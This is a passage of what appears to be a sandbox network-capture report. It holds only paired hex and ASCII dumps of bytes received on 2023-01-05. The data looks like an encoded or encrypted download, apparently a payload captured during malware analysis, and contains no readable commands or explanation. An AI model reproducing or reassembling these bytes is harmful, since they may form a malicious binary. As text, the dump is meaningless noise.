                                                                                                                                                                                    Data Ascii: 1uFpr23hrAD^cPa]s1E'rwP['Ahs5b`z7su+Q4>2hEj'mC11uFpr2fBh+P7d
                                                                                                                                                                                    2023-01-05 07:58:36 UTC10995INData Raw: 00 97 75 67 8b 32 f8 ce 75 85 03 b0 50 8c 49 48 00 32 8b 27 fc f3 c4 70 8b 3e f4 36 c6 31 00 f4 f9 77 10 64 00 00 12 b9 56 9e 83 b1 23 43 f2 fe 46 8b 83 c9 1f 02 4c fc f2 35 56 9a 2f 3c 00 62 83 b4 08 e1 3b f8 c3 28 5e 6a 8b 90 5d b5 10 64 53 25 e8 36 3a 62 00 8f 75 7c ff 06 f0 21 e8 c9 39 75 00 fc 45 98 83 b6 18 f4 00 62 8b b3 89 53 5f 2d 5b fc e5 6c c2 65 00 9f 5d 65 00 72 e8 aa 9f 9c ff 98 3f 3c 00 73 cc bb cc 64 8b 99 83 9b 08 37 8b ab b9 cc ff 9d 7f fb c1 3e 57 f8 53 67 2b f3 89 20 fc f4 f8 65 0f f0 21 33 00 62 8b 0b 14 e5 72 72 83 b9 07 b8 7d 8d 3b 86 76 60 8b 83 eb 2a 8b a5 d1 98 2b a0 3b 8a 76 70 be cf ff 8a 7f 9c 07 67 c7 49 f0 3d 42 92 8d 36 01 55 ff 8c ff 08 0f b6 e2 75 00 77 03 a4 3d 72 10 32 00 10 2a fd 48 4b 3b bb 0f f1 ce 31 00 75 51 9f ec
                                                                                                                                                                                    Data Ascii: ug2uPIH2'p>61wdV#CFL5V/<b;(^j]dS%6:bu|!9uEbS_-[le]er?<sd7>WSg+ e!3brr};v`*+;vpgI=B6Uuw=r2*HK;1uQ
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11011INData Raw: f0 56 89 6f 00 70 00 68 59 2c 5e 2c c9 f3 0c 75 8b 32 10 9b 30 9a 5c 15 00 62 59 b3 8b 97 55 f8 ec d6 0c 91 43 75 83 97 1f 0e 20 2b 2b fa 8b 27 08 a3 c8 5b 05 7f a0 34 00 6c c3 1f 08 1f c0 ef 43 72 e8 b6 d4 9d ff fb f1 e8 3d 4b bb 34 00 31 0f f0 96 77 00 64 33 b2 40 8b 30 d9 43 70 87 69 33 a8 89 2a fc ba 06 fe 00 f2 c0 11 2c f9 3d 3e a0 21 00 fb cf eb e1 6c a1 43 bb 72 00 4e c7 03 11 57 f8 a1 cf 61 53 31 8b bf ff 7d 64 71 43 77 ff e6 68 15 bc 34 00 8f 0a f1 f8 33 75 69 68 1c bc 2b 00 9b f6 69 00 31 59 b2 45 8b fe 9b ff 8d 8b 34 39 7a 75 61 68 a4 04 30 00 1f bc 35 43 75 e8 55 21 64 00 2b 59 5a d4 66 43 70 68 b8 04 30 00 9f 11 10 00 75 59 2e 8b 22 04 4b 18 47 0d a4 05 48 bb 2b 00 72 8b 31 08 f7 00 74 8b 3a f0 00 89 7f 00 32 00 62 59 2f 5e 33 c9 b0 8b 32 ec
                                                                                                                                                                                    Data Ascii: VophY,^,u20\bYUCu ++'[4lCr=K41wd3@0Cpi3*,=>!lCrNWaS1}dqCwh43uih+i1YE49zuah05CuU!d+YZfCph0uY."KGH+r1t:2bY/^32
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11027INData Raw: 83 88 ff 9b 59 99 42 61 56 ef 58 71 6a 6a 53 9b ea 67 00 31 8b 85 59 2e 85 92 74 7e 56 61 ff 77 24 71 43 68 85 b3 75 7a e8 9f cf 8a ff b0 00 68 00 72 00 d9 09 34 e8 3c ff 97 ff 2a 8b 8f 56 d9 e8 98 ff 88 59 3a 8b b5 5b b9 4d 9e 33 bd 5f 80 a9 f4 ff 88 c9 f2 8b 8a 55 fc ec 32 57 f9 7d 3e 33 94 56 8f 77 60 ff 04 0c 88 75 39 ff 60 20 76 43 64 85 b2 75 24 ff 77 40 70 43 68 50 9b 23 b8 ff ce 59 9d 53 b8 ff 9b 8b 42 eb 1f 3b 25 0c 06 25 28 8b bc 50 9f 40 30 00 75 85 b7 74 60 8b 82 eb 25 56 9d 77 78 ff 1f 0c 8c 75 7f ff 24 20 74 43 77 85 a4 74 b2 89 75 10 3d 8b b6 5e 35 c3 f8 ff 22 8b dd 56 22 8b 0a 0c 57 f6 24 ff 45 08 9d 77 7c ff 1d 08 8c 15 57 01 72 00 f0 c0 02 16 9b 15 32 00 71 00 32 e8 ca ce 97 ff 2a e8 9d ce ce ff fe 30 9c 2d 5f 47 7e 76 17 40 e9 cf 20 e8
                                                                                                                                                                                    Data Ascii: YBaVXqjjSg1Y.t~Vaw$qChuzhr4<*VY:[M3_U2W}>3Vw`u9` vCdu$w@pChP#YSB;%%(P@0ut`%Vwxu$ tCwtu=^5"V"W$Ew|Wr2q2*0-_G~v@
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11043INData Raw: 83 8f 02 44 07 ff 45 a3 0c 24 eb 78 83 ca 03 e8 45 a4 75 6a 0c 7b 57 88 33 b9 45 8a e8 08 c6 9b ff f8 55 cd 59 3b 8b 7b 80 a2 01 f8 c1 ff 55 ce 83 94 3f b6 f8 62 6b bb 38 ba 55 b6 8b 74 85 80 be 30 00 ff 54 39 28 fe 0b fc c1 e7 e1 4d c1 ca 06 09 c9 48 f6 2d 14 71 8b 73 85 d9 be 36 00 b1 44 6c 29 72 74 2f ff 51 e8 93 fc 97 ff f8 f0 2e 85 c7 74 7a ff 44 e8 60 af 8d ff 6b 8b a4 e9 5a 01 68 00 fe 45 89 c6 74 fe 75 50 88 75 70 8d 07 d4 b1 ec 7a 6a 76 59 e3 fc 8c 33 84 a5 d9 4c 8d ff 88 8b 77 8b 82 83 f6 24 e7 f6 04 03 3a eb b5 8a 32 fe ba ca b4 f9 71 83 86 3f 19 d2 0a 8b 6e 8d 98 be 2b 00 fb 44 66 29 ba 0b fe c1 b6 f8 62 83 93 3f 59 d1 5a 8b 7c 85 80 be 30 00 fc 45 25 c1 9d 10 45 44 75 2d 56 01 02 44 73 2d 86 45 97 48 06 1f 81 45 25 08 01 19 fc 0b ef c1 f1 e1
                                                                                                                                                                                    Data Ascii: DE$xEuj{W3EUY;{U?bk8Ut0T9(MH-qs6Dl)rt/Q.tzD`kZhEtuPupzjvY3Lw$:2q?n+Df)b?YZ|0E%EDu-VDs-EHE%
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11059INData Raw: d9 eb df 88 9e 06 1a ae c0 ed 0d c7 48 34 00 bd c0 ab fc ec d9 f9 df 90 9e 1c 0d cb 01 77 00 31 c3 cd 00 77 00 64 eb 8a b8 30 00 62 00 9b f1 3e 83 9f 74 fc f4 67 83 99 08 aa 1c 40 83 9e 08 ef 1c 46 9b ad 76 60 e8 07 07 77 00 b2 c4 61 dd 11 08 b9 06 f1 c4 46 5e e7 c0 04 05 81 2e 71 00 77 c3 fd cc b9 cc bb cc a8 cc be cc b2 7a 6c 05 05 11 0e 8b ee 5c 88 ff ce 80 ba 02 f7 e7 9a b3 4d eb 36 66 d9 3f 63 66 e1 9d 2d ff 88 ff e8 ad 2b ff 88 ff df 0e 3b 43 32 d9 87 89 e5 6c 97 ff 8c 9b aa bd 51 ff 8a ff b1 85 14 ff 8d ff 32 9b e8 8d 11 ff 97 ff a3 e1 a7 f9 e1 c1 ff c1 53 0f b3 0f cc c0 b3 e1 66 04 70 00 e3 da 70 d8 f4 c3 21 50 27 51 fc 0b 9b 15 16 02 71 00 3b 5a 28 ff 4b 80 09 0e 72 75 20 66 fe 9d 2b ff 9b ff f2 cf 30 80 85 fe c3 3f 83 04 15 bb 48 13 57 89 e8 5e
                                                                                                                                                                                    Data Ascii: H4w1wd0b>tg@Fv`waF^.qwzl\M6f?cf-+;C2lQ2Sfpp!P'Qq;Z(Kru f+0?HW^
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11075INData Raw: fc 8d ff db b3 cd fe 8f 8d e5 18 8f ff 88 e9 99 af 8b ff fa 8d 54 fc 8d ff db 9d cd fe 8f 8d e5 48 8f ff 88 e9 a3 af 8b ff fa 8d 04 fc 8d ff db 87 cd fe 8f 8d e5 78 8f ff 88 e9 4d af 8b ff fa 8d f4 fc 8d ff db 71 cd fe 8f 8d e5 a8 8f ff 88 e9 57 af 8b ff fa 8d f4 f9 8d ff db 5b cd fe 8f 8b 3c 24 7b 8d 35 0c ba 8a 29 f9 88 ff 57 c8 9a 89 f5 fe 9d 8b 3a fc 5b c8 9b 7f b0 fe ce b8 b5 84 34 00 8d 75 ab fe cd cc ae cc fd 4d 60 e9 5b af 89 ff bc 8d 91 fe 88 ff 8d 1d dd fe cd 8d ef 74 8f ff 97 e9 61 af 89 ff bc 8d 31 ff 88 ff 8d 07 dd fe cd 8d ef fc 8e ff 97 e9 8f ae 89 ff bc 8d 29 ff 88 ff 8d f1 dc fe cd 8d ef 14 8f ff 97 e9 95 ae 89 ff bc 8d 61 ff 88 ff 8d db dc fe cd 8d ef fc 8e ff 97 e9 a3 ae 89 ff bc 4d e5 e9 bf ae 9a ff ff 8d d6 fe 9d ff 99 bd c6 fe 8c 8d
                                                                                                                                                                                    Data Ascii: THxMqW[<${5)W:[4uM`[ta1)aM
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11091INData Raw: 00 77 00 e4 0a 31 00 30 00 62 00 f4 0a 2b 00 72 00 77 00 b9 0a 36 00 76 00 64 00 fe 0a 71 00 63 00 70 00 f8 0a 30 00 74 00 31 00 b1 5f 34 00 65 00 72 00 a6 0a 21 00 71 00 68 00 eb 0a 34 00 30 00 75 00 eb 0a 27 00 70 00 32 00 c2 0a 33 00 69 00 73 00 d3 0a 72 00 77 00 77 00 cc 0a 31 00 33 00 62 00 dc 0a 2b 00 71 00 77 00 81 0a 36 00 76 00 64 00 c6 0a 71 00 63 00 70 00 d0 0a 30 00 76 00 31 00 c9 0a 34 00 66 00 72 00 f2 0a 21 00 72 00 68 00 b7 0a 34 00 33 00 75 00 bf 0a 27 00 70 00 32 00 ae 0a 33 00 6a 00 73 00 a7 0a 72 00 77 00 77 00 b0 0a 31 00 30 00 62 00 a8 0a 2b 00 70 00 77 00 ed 0a 36 00 74 00 64 00 92 0a 71 00 60 00 70 00 8c 0a 30 00 75 00 31 00 9d 0a 34 00 66 00 72 00 de 0a 21 00 79 00 68 00 8b 0a 34 00 38 00 75 00 73 0b 27 00 75 00 32 00 6e 0b 33 00
                                                                                                                                                                                    Data Ascii: w10b+rw6vdqcp0t1_4er!qh40u'p23isrww13b+qw6vdqcp0v14fr!rh43u'p23jsrww10b+pw6tdq`p0u14fr!yh48us'u2n3
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11107INData Raw: 44 77 00 30 00 75 00 77 00 64 80 72 30 32 00 62 00 70 00 68 00 73 00 77 00 31 00 19 6f 10 31 54 00 72 00 32 00 62 00 70 00 68 00 73 00 77 00 31 00 85 3f 77 00 64 00 72 00 c2 3f 51 04 70 00 68 00 73 00 44 04 31 00 75 00 77 00 64 00 72 00 32 00 62 00 70 00 68 00 73 00 77 00 ce 07 75 00 77 00 64 00 72 00 32 00 62 00 70 00 68 00 73 00 77 00 31 80 36 00 38 00 2a 00 3d 00 67 00 36 00 54 00 68 00 73 00 77 00 31 00 75 00 88 ff 9b ff 8d ff 3d 00 9d ff 8f ff 97 ff 7c 00 77 00 31 00 75 c0 ac 3f 64 00 72 00 32 c0 b9 3f 60 f8 97 ff 8c ff f8 42 21 f8 8a ff 88 ff eb 42 72 00 32 80 9d ff 8f 7f 68 00 73 80 88 ff ce 7f 75 78 e8 50 77 44 a1 3f 6a b3 70 1f 41 ef 77 3d 73 00 77 00 31 00 75 00 88 ff 9b ff 8d ff cd ff 9d ff 8f ff 97 ff 8c ff 77 00 31 00 75 00 77 00 64 00 72 00
                                                                                                                                                                                    Data Ascii: Dw0uwdr02bphsw1o1Tr2bphsw1?wdr?QphsD1uwdr2bphswuwdr2bphsw168*=g6Thsw1u=|w1u?dr2?`B!Br2hsuxPwD?jpAw=sw1uw1uwdr
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11123INData Raw: c2 32 00 65 00 73 00 49 c2 73 00 7b 00 77 00 2d c2 30 00 39 00 62 00 24 c2 2a 00 63 00 77 00 6e c2 37 00 66 00 64 00 18 c2 70 00 72 00 70 00 02 c2 31 00 7c 00 31 00 1f c2 35 00 70 00 72 00 40 c2 20 00 65 00 68 00 0e c2 35 00 27 00 75 00 ff c2 26 00 65 00 32 00 f1 c2 32 00 7c 00 73 00 e9 c2 73 00 6c 00 77 00 cd c2 30 00 28 00 62 00 c4 c2 2a 00 6a 00 77 00 85 c2 37 00 63 00 64 00 c6 c2 70 00 7f 00 70 00 d4 c2 31 00 69 00 31 00 b2 c2 35 00 7b 00 72 00 e0 c2 20 00 50 00 68 00 ae c2 35 00 13 05 e6 19 72 00 64 00 ce 87 71 00 62 00 70 00 68 00 73 00 77 00 31 00 75 00 77 00 64 00 72 00 33 00 62 00 8f ff 97 ff 63 c3 35 00 31 00 75 00 6f c3 26 00 73 00 32 00 42 c3 32 00 69 00 73 00 5f c3 73 00 76 00 77 00 54 c3 30 00 32 00 62 00 52 05 fb 19 61 00 77 00 21 88 36 00
                                                                                                                                                                                    Data Ascii: 2esIs{w-09b$*cwn7fdprp1|15pr@ eh5'u&e22|sslw0(b*jw7cdpp1i15{r Ph5rdqbphsw1uwdr3bc51uo&s2B2is_svwT02bRaw!6
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11139INData Raw: 33 2d 33 ad 33 c7 33 c9 33 b0 33 6e 35 73 36 be 36 e2 36 e9 36 a3 38 94 38 d4 39 5b 3a a7 3a 9a 3a 3f 3b ad 3b 2f 3c 32 3c 19 3c e6 3c 94 3d c5 3d 6a 3e 69 3e 85 3f 88 3f 77 00 31 d0 74 00 07 00 64 00 11 30 96 30 b6 30 77 31 72 31 3f 34 4d 35 75 35 24 35 f5 35 d0 35 b7 35 e2 35 7f 36 30 36 2f 36 12 36 08 36 a6 36 c7 36 ca 36 7d 38 5d 38 be 38 f8 38 d3 38 7d 39 6d 39 20 39 53 39 25 3b 2d 3b 17 3b 0f 3b 9d 3b d4 3b a4 3c 0c 3d f6 3d d7 3d 84 3d cf 3d b3 3d ad 3d a6 3d ed 3d 8e 3d 8a 3d 6f 3e 11 3e a0 3e 56 3f 75 e0 76 00 bc 00 72 00 36 30 31 30 2e 30 f5 30 b5 30 6e 31 6f 31 17 31 1d 31 12 31 e2 31 fb 31 bc 31 99 31 99 31 8f 31 75 32 3c 32 66 32 56 32 5b 32 2a 32 6f 32 14 32 f7 32 e4 32 e9 32 df 32 9e 32 c2 32 b8 32 b9 32 97 32 cf 32 74 33 3d 33 1f 33 c2 33
                                                                                                                                                                                    Data Ascii: 3-33333n5s6666889[:::?;;/<2<<<==j>i>??w1td000w1r1?4M5u5$55555606/666666}8]8888}9m9 9S9%;-;;;;;<===========o>>>V?uvr6010.000n1o1111111111u2<2f2V2[2*2o222222222222t3=333
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11155INData Raw: a5 c5 46 5a 1e fc 8c c5 35 6b 16 61 ae 4a b8 5a 06 ba b9 d8 94 24 be 59 d5 f5 1e bc 4d c4 53 ba 3e 74 e0 36 cc 82 1a 7c 56 da 01 b1 3f 33 a8 49 2b ba 64 05 84 b0 b4 cc 89 8a 4c 73 1d da 14 6c fc 02 61 f6 26 da f0 25 7e 94 f7 c6 4d 58 8d 0b b4 25 66 6d 5c f6 8d a7 eb 16 47 da 60 93 23 2c aa 0e c1 66 4f da e6 21 b6 09 70 1c 47 e1 a7 fa c8 d3 7c 23 b8 49 54 b6 65 05 9c 84 90 cd 14 0d 11 ba be 25 dc a3 d7 c0 c8 bd ae a6 bb aa 20 71 41 fb cb 6e 32 26 8e 85 fd f2 ba 05 c6 75 cc d3 99 81 de e8 45 f9 9a 95 68 cd 34 37 46 9b aa fb a4 0d 28 20 c8 8e 12 78 49 04 4b 20 3b c2 72 bb 2b a1 a5 fb 91 4e 11 d2 76 ab c2 07 a4 04 fb 6c 9e 3e 89 13 44 fa 02 04 d2 d8 9b cd 62 3f c1 1b 1f fa 53 25 ef 3d 6c b5 da 8a bb 06 07 6e 8e b4 77 00 64 80 2f bf 53 e0 7f 2e 3a 70 d3 63 db
                                                                                                                                                                                    Data Ascii: FZ5kaJZ$YMS>t6|V?3I+dLsla&%~MX%fm\G`#,fO!pG|#ITe% qAn2&uEh47F( xIK ;r+Nvl>Db?S%=lnwd/S.:pc
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11171INData Raw: 57 73 b2 56 03 3e b6 b7 20 b0 4a 91 54 3d 7e b5 0b 40 69 75 b1 c3 a1 da c7 6f 50 e9 26 09 8d 30 0f fe 34 61 c2 a3 59 09 64 ed d6 69 cb 04 27 3d
                                                                                                                                                                                    Data Ascii: WsV> JT=~@iuoP&04aYdi'=
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11171INData Raw: b2 9d fc aa b2 48 0b 28 74 77 5d 13 0e 6e 31 0e 77 13 59 6a 13 80 c1 99 a1 08 a2 cd 19 a4 e7 18 e5 53 06 62 36 14 b7 7b 24 b5 63 af 6e f8 56 e8 ad f8 1a 0c 09 c0 34 fb b3 91 f5 e9 4f 1e 1d 83 31 98 81 09 c1 f3 32 63 78 02 dc 44 0d dc ce 98 0e 4c 30 75 60 92 6c 3e 20 0c 17 cb fc a9 aa 86 9f b4 9f c6 a9 e3 da f9 90 30 e9 82 f9 8f 5d 77 25 da 33 63 9a 7d 16 5b 48 56 fe f2 f4 3d 77 3c 45 a6 07 f1 77 2e 33 81 a2 88 05 e9 c4 83 ae c1 47 9a 1e 2c 7b b5 52 72 57 e6 0b f3 f1 a2 dc a8 34 7b a3 72 40 90 f5 53 0f 8b 14 53 5a e6 8a 35 1f 44 e8 54 c6 09 51 26 be 27 a2 46 a9 4d 95 d8 f3 82 76 db 48 88 16 aa 6e a3 d7 09 6b 0a 3f f6 9e eb 78 b6 5c 3b 53 96 06 cb 63 1a 76 5d 49 c5 fd 80 95 1d b4 ac 4c 33 6b 29 a0 48 39 96 ff d1 2e 8d 9f 87 ba bc 8f 21 8c 42 45 d9 d7 ee a7
                                                                                                                                                                                    Data Ascii: H(tw]n1wYjSb6{$cnV4O12cxDL0u`l> 0]w%3c}[HV=w<Ew.3G,{RrW4{r@SSZ5DTQ&'FMvHnk?x\;Scv]IL3k)H9.!BE
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11187INData Raw: dc 69 c3 ae 52 1e c7 e3 9e 2c a6 76 26 33 ff b2 e4 27 f9 58 99 32 1a 85 a9 ae 52 19 d4 1d 86 6a 0b 9e c3 c6 c7 f0 c4 4f e5 9c 32 85 02 a2 d5 c9 fc 31 8b 41 ad 6f 65 48 a6 2b 5a fe b2 6e e1 53 23 f2 35 52 0f ec 18 23 e8 4f c3 37 9c 45 ad fd 0f f1 ba 1f 35 7f 17 bd 7b dc 73 eb 8e dc 70 7b 67 7d ad 0d 7e 05 55 d4 95 61 ba f6 b6 97 f6 21 9d 2d 12 24 c4 d5 70 64 79 c4 fa 55 84 c3 0d 3d 1d a2 e9 7e 23 ef e0 5a bf 28 18 38 fc 70 64 63 76 84 0a 4a 2d 9d 7d 77 c1 2b 92 85 1e a6 7d 9a a0 93 df 05 76 52 b7 22 66 3d e2 e7 a2 e6 fb c6 a6 eb d7 cb ca 40 b8 23 9f 39 2c 31 ba 10 a2 9a 38 74 9e fc 0b f7 0e 7b 76 a7 18 9c 46 33 95 91 9b 89 b7 04 f9 f2 59 ae b9 9f 3e 7c 9d e0 4d e9 9b 27 18 fc fe e2 8d 53 40 8a 24 ef 28 ed 34 59 fa 68 c0 49 95 8b 87 6c d3 15 d7 9f b5 69 e3
                                                                                                                                                                                    Data Ascii: iR,v&3'X2RjO21AoeH+ZnS#5R#O7E5{sp{g}~Ua!-$pdyU=~#Z(8pdcvJ-}w+}vR"f=@#9,18t{vF3Y>|M'S@$(4YhIli
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11203INData Raw: 0b 88 a3 94 20 44 e9 3d 2b 99 a3 e4 f7 75 27 12 09 88 65 b9 91 91 22 fa bb ad 11 12 b8 7b e0 8e ce 20 04 a6 78 42 b9 3b ef 02 a3 98 1d 81 a7 66 f5 b1 8c c8 f3 3a 89 9b f6 04 55 ad fc 20 4d a6 f7 29 73 7d ee fd fb 8d 9d 2b 9e db 2d 49 7a 90 1a d0 b2 23 db 52 f0 5d 9c 5d 69 75 80 c3 21 56 79 2e b3 bc 9a 82 ef bb 60 45 c2 67 4a f7 6a 84 a3 5d 4e b7 14 35 d8 fd eb 9e fd 05 0f 67 40 df 0e 60 de d8 bf 3e f1 a6 52 c4 4d d5 3d 30 a3 19 2f 2b 67 66 58 5f 40 1d 74 90 dd 7b 6b 39 0d fa 65 21 2d 6f 53 8b bc 6c 29 b4 32 ef 92 2d 15 19 a5 e5 26 e9 af fb 58 be 26 4e 0c e5 6c d3 d8 be 14 fb 36 cc fb f8 2d 45 32 5a fa 43 88 df c2 db 69 c0 fa e0 50 cd fc 14 fd d6 4f 9f 16 f9 37 00 60 fc 36 80 5e b2 65 14 5a ed 7d a0 a7 82 f6 f3 d5 0b 0c a4 c9 fd 83 ca 81 8a 2d 4d d4 6d 0d
                                                                                                                                                                                    Data Ascii: D=+u'e"{ xB;f:U M)s}+-Iz#R]]iu!Vy.`EgJj]N5g@`>RM=0/+gfX_@t{k9e!-oSl)2-&X&Nl6-E2ZCiPO7`6^eZ}-Mm
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11219INData Raw: 66 c6 f7 6b 31 b0 ed 19 4f b7 fc 5c 00 01 3b de 02 84 d9 b4 e6 56 20 23 0d 72 16 97 0e e2 2f f6 d8 7d 25 e8 b1 ac 54 ff d0 e2 f3 63 67 26 4e 14 a2 f1 db 9f b3 35 69 36 e0 ae 73 0d ee 36 a9 7a 58 44 27 e2 49 99 ef ab 8e 7e ea 3a 7a 8d ad f8 0f 94 b9 e4 df c3 e5 67 64 59 a6 b8 45 1d d9 30 7b ea b9 29 f3 af 0e 6d 18 7a 53 ac 8e 72 c9 ab 68 2c 55 ef 52 b6 f4 f4 2c 78 cd a1 c3 90 64 51 19 af b5 3c 08 55 73 57 21 1a 7f 13 f8 d6 cb 2c 16 05 e4 71 1e db ae b0 cb 91 b0 6f e3 e8 32 da 31 c2 58 56 e3 45 a3 6d e7 84 f6 81 62 81 82 bc 66 b0 da 24 b1 ab d7 7c 67 54 50 46 5f ba ce 6d 6f 41 4e 7a a3 c5 a5 ef 06 62 c0 17 77 f2 d5 f2 41 ec 99 b3 a7 6d d7 5d 7c 54 2d ce 6b 71 d5 31 89 2e 85 96 97 0e 28 26 ef 98 1d 06 a8 c8 14 68 46 dc 3d 70 0b 61 9c 9b 1e 77 54 fc 26 54 de
                                                                                                                                                                                    Data Ascii: fk1O\;V #r/}%Tcg&N5i6s6zXD'I~:zgdYE0{)mzSrh,UR,xdQ<UsW!,qo21XVEmbf$|gTPF_moANzbwAm]|T-kq1.(&hF=pawT&T
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11235INData Raw: 62 eb e0 2a 59 3e 42 cd 7a 77 a8 ae 82 0d c0 5f 31 12 6d 6f 4c 43 a4 d2 42 46 c6 8e 2c 02 bd f8 d5 a7 11 ec 12 9f 72 9f 6f 4e 3a fa fb 64 be 6c 2d f4 7f f7 80 59 06 05 a1 d5 58 cf 0d 11 57 d6 25 a6 e8 69 c1 16 b2 a0 51 9b e7 0c 31 38 8b 2f a7 8c a0 e6 d0 75 2a 12 79 67 03 7f e0 59 16 2c 3d 5f 1d b2 75 e2 3d cd f4 11 ca e7 2f 00 af ae 1e 4a f6 6a 05 71 6e 84 6a 98 28 5c 1d b1 58 b4 bb b8 d8 3f ad c4 7c 2c 3a 28 86 c9 25 cf 6a 9f ef d7 23 77 f2 37 20 37 7f 55 73 ae 44 87 ff 09 18 5d 4d 66 d0 87 3e da a9 46 79 9d d8 59 0b 28 41 5b 82 a5 ab f6 8f c8 a3 48 cb ed af 92 78 77 85 1c fe d7 2d 84 cd 0b 92 13 fb c9 d7 1b cd 6d 62 f2 3a 5e 60 f6 b2 df 00 f9 c8 28 13 ce 25 5f bc 55 17 11 fa 21 b7 09 18 d8 1a 0a 8b 81 78 9f e7 ca 31 84 e7 d6 2a d1 80 8e be b6 cd b8 a6
                                                                                                                                                                                    Data Ascii: b*Y>Bzw_1moLCBF,roN:dl-YXW%iQ18/u*ygY,=_u=/Jjqnj(\X?|,:(%j#w7 7UsD]Mf>FyY(A[Hxw-mb:^`(%_U!x1*
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11251INData Raw: e5 e9 f4 de 72 91 60 b5 72 58 59 c5 90 18 6b 7e 1f 8b 4f c6 69 4c e5 2d 39 85 57 bc c7 29 d3 fc 2d 75 8b 16 e7 9f 2c 6e af cc b4 31 ad d8 8c 9a eb 47 bf e4 72 66 b0 ba 63 0a 16 8a ad f8 b2 55 b6 70 10 78 50 a2 64 b0 26 fe ea 81 be c0 a5 44 2e ba 95 f2 5d 91 bc d3 f1 b7 ac 3d c6 7d 04 f2 b9 01 8c 25 c8 03 09 1b f6 e1 5c 00 b1 d2 1c 95 13 a2 f7 e4 80 f5 05 f5 10 70 9c e0 92 07 cf be bd cf 8e 72 9a 20 72 c3 ff 37 e6 00 2b 20 c4 13 20 00 15 72 4c 0e f7 35 0a a7 0e 9e ef ce 8d 59 63 63 57 eb cd bb 81 ca 6d 03 2e ac 19 16 31 99 36 62 3d af 3d e7 4f b9 d4 e1 3c ff 49 45 01 ad 7a 6e 57 61 42 27 1f b6 77 fe 6f 5a d4 9c 9f 45 be a1 8d c5 5d ad 79 16 48 50 b6 5f 0a 0f a9 77 23 69 e8 79 96 b5 7e ab 0f 4d 45 41 83 a1 99 b4 d3 c4 9d 32 8e dc 87 c2 40 75 ae 47 3a 62 4e
                                                                                                                                                                                    Data Ascii: r`rXYk~OiL-9W)-u,n1GrfcUpxPd&D.]=}%\pr r7+ rL5YccWm.16b==O<IEznWaB'woZE]yHP_w#iy~MEA2@uG:bN
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11267INData Raw: 8c 03 6b 0f e3 61 16 d9 3b df 19 1c 2d 1e 5b 7b 88 83 6a 8a df 6a c2 7c 30 77 22 f9 a3 22 47 49 47 13 d6 f3 e5 29 2f f4 d0 a8 0d 12 6e 82 22 d2 44 e2 6c 1b f2 57 9f 6f be 06 2a ed 27 70 1c 70 c0 1a 8a ee c1 87 a1 38 c2 fa 6c 85 f5 27 bc 94 e3 c6 53 85 20 1c 72 0f c3 c4 cc 8d 9b a6 1e be 50 65 f9 93 cd 94 3b 42 10 fe 56 45 8c da 6b 83 28 c1 09 ef 39 00 91 a8 97 75 b1 d0 bc 53 5c b6 a7 86 9c 7c 08 25 13 5c d6 f9 ea 6d 59 3a f5 d0 de 7a 0d f2 06 31 06 43 22 c5 3e dd f1 4a 07 2a 29 69 08 88 3c 60 29 39 76 ae d9 18 39 1b 6e f3 87 e2 63 c4 c9 b6 96 13 f7 9e da 3e fc 19 be 5f 68 13 6b af dd 4c e6 6b 2d 94 51 fc d4 ee 89 d8 b3 33 77 8c 85 c6 58 67 73 b7 43 7d 7c 25 1b e4 96 42 f3 c6 f4 86 0e 42 be 95 c5 01 1e cb c4 6a d8 9f 06 a4 29 b6 4e bd 4c 9c 3d 76 b6 27 a5
                                                                                                                                                                                    Data Ascii: ka;-[{jj|0w""GIG)/n"DlWo*'pp8l'S rPe;BVEk(9uS\|%\mY:z1C">J*)i<`)9v9nc>_hkLk-Q3wXgsC}|%BBj)NL=v'
                                                                                                                                                                                    2023-01-05 07:58:36 UTC11283INData Raw: 28 61 c0 d3 6f 06 d7 b5 fb 83 cc a3 ca 83 2f ac 1a 7e 7f 79 67 80 3c 5e ce a7 64 e4 19 fd 1e 94 6a 46 3e 8d 0c b8 de c3 51 7d 58 a2 bc 5a 2c fe 24 df 9e 71 e3 2b 70 74 d8 25 d1 df 78 9c 22 c7 16 a4 a8 c7 8f f4 65 26 71 41 64 84 86 3a 8d 15 5c d5 7b ef 5d 95 8f 4b da 6b 55 a3 04 d8 5d a4 ad d0 69 f7 7b f9 e7 8d f7 5b 6e 56 15 2c 0e ec ec 2d d6 6a b5 b5 44 4d 24 d5 c0 15 fe c7 79 de a0 85 4e ba 66 99 51 a6 30 f3 a2 22 4d d2 0a 9d 8e eb 8b 4f cf 70 35 67 40 c1 00 d2 85 76 c6 d0 98 4e 1a 89 dc 7d 62 a7 70 b1 eb 2a ad 40 e4 2e 33 72 56 b1 8b 8e 18 5b c3 b8 23 92 24 91 1c 96 41 c3 34 0f e3 a5 1b 73 f3 2f f7 d8 26 de 09 2e 9a 2c 50 ba 93 e6 8b fd 37 e4 b4 b4 99 e4 26 08 77 02 b7 a5 04 98 d4 90 24 e8 d3 55 a7 c5 9b f4 76 aa f2 f0 0d c4 25 33 26 1d 7b 88 ce 07 8f
                                                                                                                                                                                    Data Ascii: (ao/~yg<^djF>Q}XZ,$q+pt%x"e&qAd:\{]KkU]i{[nV,-jDM$yNfQ0"MOp5g@vN}bp*@.3rV[#$A4s/&.,P7&w$Uv%3&{
